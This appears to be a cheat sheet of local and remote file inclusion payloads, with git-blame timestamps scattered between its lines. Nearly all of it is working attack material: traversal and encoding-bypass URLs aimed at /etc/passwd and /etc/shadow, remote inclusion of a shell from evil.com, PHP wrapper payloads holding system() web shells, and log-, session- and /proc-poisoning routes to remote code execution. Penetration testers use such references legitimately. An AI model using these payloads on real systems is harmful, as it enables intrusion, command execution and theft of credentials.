2016-10-20 02:39:06 +00:00
# Local/Remote File Inclusion
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
2018-07-07 10:04:55 +00:00
## Summary
* [Basic LFI ](#basic-lfi )
* [Basic RFI ](#basic-rfi )
* [LFI / RFI using wrappers ](#lfi--rfi-using-wrappers )
* [Wrapper php://filter]()
* [Wrapper zip://]()
* [Wrapper data://]()
* [Wrapper expect://]()
* [Wrapper input://]()
* [LFI to RCE via /proc/*/fd ](#lfi-to-rce-via-procfd )
* [LFI to RCE via /proc/self/environ ](#lfi-to-rce-via-procselfenviron )
* [LFI to RCE via upload ](#lfi-to-rce-via-upload )
* [LFI to RCE via phpinfo() ](#lfi-to-rce-via-phpinfo )
* [LFI to RCE via controlled log file ](#lfi-to-rce-via-controlled-log-file )
* [LFI to RCE via PHP sessions ](#lfi-to-rce-via-php-sessions )
2017-08-15 00:37:09 +00:00
Interesting files to check out :
```
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
2017-09-23 22:32:55 +00:00
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
2018-07-07 10:04:55 +00:00
```
The following log files are controllable and can be included with an evil payload to achieve a command execution
```
2017-09-23 22:32:55 +00:00
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/error_log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail
```
2018-07-07 10:04:55 +00:00
2017-09-23 22:32:55 +00:00
## Basic LFI
```
http://example.com/index.php?page=../../../etc/passwd
2018-07-07 10:04:55 +00:00
```
2017-09-23 22:32:55 +00:00
Null byte
2018-07-07 10:04:55 +00:00
```
2017-09-23 22:32:55 +00:00
http://example.com/index.php?page=../../../etc/passwd%00
2018-07-07 10:04:55 +00:00
```
2017-09-23 22:32:55 +00:00
Double encoding
2018-07-07 10:04:55 +00:00
```
2017-09-23 22:32:55 +00:00
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
2018-07-07 10:04:55 +00:00
```
2017-09-23 22:32:55 +00:00
Path truncation
2018-07-07 10:04:55 +00:00
```
2017-09-23 22:32:55 +00:00
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
2018-07-07 10:04:55 +00:00
```
2017-09-23 22:32:55 +00:00
2018-07-07 10:04:55 +00:00
Filter bypass tricks
```
2017-09-23 22:32:55 +00:00
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
2018-07-07 10:04:55 +00:00
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
2017-08-15 00:37:09 +00:00
```
2018-07-07 10:04:55 +00:00
## Basic RFI
2017-08-15 00:37:09 +00:00
```
http://example.com/index.php?page=http://evil.com/shell.txt
2018-07-07 10:04:55 +00:00
```
Null byte
```
2017-08-15 00:37:09 +00:00
http://example.com/index.php?page=http://evil.com/shell.txt%00
2018-07-07 10:04:55 +00:00
```
Double encoding
```
2017-08-15 00:37:09 +00:00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
```
2018-07-07 10:04:55 +00:00
## LFI / RFI using wrappers
2017-07-02 21:10:34 +00:00
2018-07-07 10:04:55 +00:00
### Wrapper php://filter
The part "php://filter" is case insensitive
2016-10-20 02:39:06 +00:00
```
2016-10-24 17:15:10 +00:00
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
2017-07-02 21:10:34 +00:00
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
2018-07-07 10:04:55 +00:00
```
2017-07-02 21:10:34 +00:00
2018-07-07 10:04:55 +00:00
can be chained with a compression wrapper for large files.
```
2017-07-02 21:10:34 +00:00
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
2016-10-20 02:39:06 +00:00
```
2017-07-02 21:10:34 +00:00
2018-07-07 10:04:55 +00:00
### Wrapper zip://
2016-10-20 02:39:06 +00:00
```python
2017-11-09 08:05:50 +00:00
echo "< pre > <?php system($_GET['cmd']); ?> < / pre > " > payload.php;
2017-08-15 00:37:09 +00:00
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
2017-07-02 21:10:34 +00:00
2016-10-24 17:15:10 +00:00
http://example.com/index.php?page=zip://shell.jpg%23payload.php
2016-10-20 02:39:06 +00:00
```
2018-07-07 10:04:55 +00:00
### Wrapper data://
2016-10-20 02:39:06 +00:00
```
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
2018-07-07 10:04:55 +00:00
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?> "
2016-10-20 02:39:06 +00:00
```
2018-07-07 10:04:55 +00:00
Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+`
2016-10-20 02:39:06 +00:00
2018-07-07 10:04:55 +00:00
### Wrapper expect://
2017-07-02 21:10:34 +00:00
```
http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls
```
2018-07-07 10:04:55 +00:00
### Wrapper input://
Specify your payload in the POST parameters
2016-10-20 02:39:06 +00:00
```
2018-07-07 10:04:55 +00:00
http://example.com/index.php?page=php://input
POST DATA: <? system('id'); ?>
2016-10-20 02:39:06 +00:00
```
2017-08-15 00:37:09 +00:00
## LFI to RCE via /proc/*/fd
1. Upload a lot of shells (for example : 100)
2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD
with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
2018-07-07 10:04:55 +00:00
## LFI to RCE via /proc/self/environ
Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file
```
GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
```
2017-08-15 00:37:09 +00:00
2018-07-07 10:04:55 +00:00
## LFI to RCE via upload
If you can upload a file, just inject the shell payload in it (e.g : "<?php system($_GET['c']); ?> " ).
2017-08-15 00:37:09 +00:00
```
http://example.com/index.php?page=path/to/uploaded/file.png
```
2018-07-07 10:04:55 +00:00
In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf
2017-08-15 00:37:09 +00:00
2018-07-07 10:04:55 +00:00
## LFI to RCE via phpinfo()
2017-09-13 21:55:29 +00:00
https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py)
2017-09-23 22:32:55 +00:00
## LFI to RCE via controlled log file
2018-07-07 10:04:55 +00:00
Just append your PHP code into the log file by doing a request to the service (Apache, SSH..) and include the log file.
2017-09-23 22:32:55 +00:00
```
http://example.com/index.php?page=/var/log/apache/access.log
http://example.com/index.php?page=/var/log/apache/error.log
http://example.com/index.php?page=/var/log/vsftpd.log
http://example.com/index.php?page=/var/log/sshd.log
http://example.com/index.php?page=/var/log/mail
http://example.com/index.php?page=/var/log/httpd/error_log
http://example.com/index.php?page=/usr/local/apache/log/error_log
http://example.com/index.php?page=/usr/local/apache2/log/error_log
```
2018-07-07 10:04:55 +00:00
## LFI to RCE via PHP sessions
2017-09-23 22:32:55 +00:00
Check if the website use PHP Session (PHPSESSID)
```
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
```
In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] files
```
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
```
Set the cookie to <?php system('cat /etc/passwd');?>
```
login=1& user=<?php system("cat /etc/passwd");?> & pass=password& lang=en_us.php
```
Use the LFI to include the PHP session file
```
login=1& user=admin& pass=password& lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
```
2016-10-20 02:39:06 +00:00
## Thanks to
2017-07-04 21:17:59 +00:00
* [OWASP LFI ](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion )
* [HighOn.coffee LFI Cheat ](https://highon.coffee/blog/lfi-cheat-sheet/ )
2017-08-15 00:37:09 +00:00
* [Turning LFI to RFI ](https://l.avala.mp/?p=241 )
2017-09-13 21:55:29 +00:00
* [Is PHP vulnerable and under what conditions? ](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html )
2017-09-23 22:32:55 +00:00
* [Upgrade from LFI to RCE via PHP Sessions ](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/ )
* [Local file inclusion tricks ](http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html )
2018-07-07 10:04:55 +00:00
* [CVV #1: Local File Inclusion - SI9INT ](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a )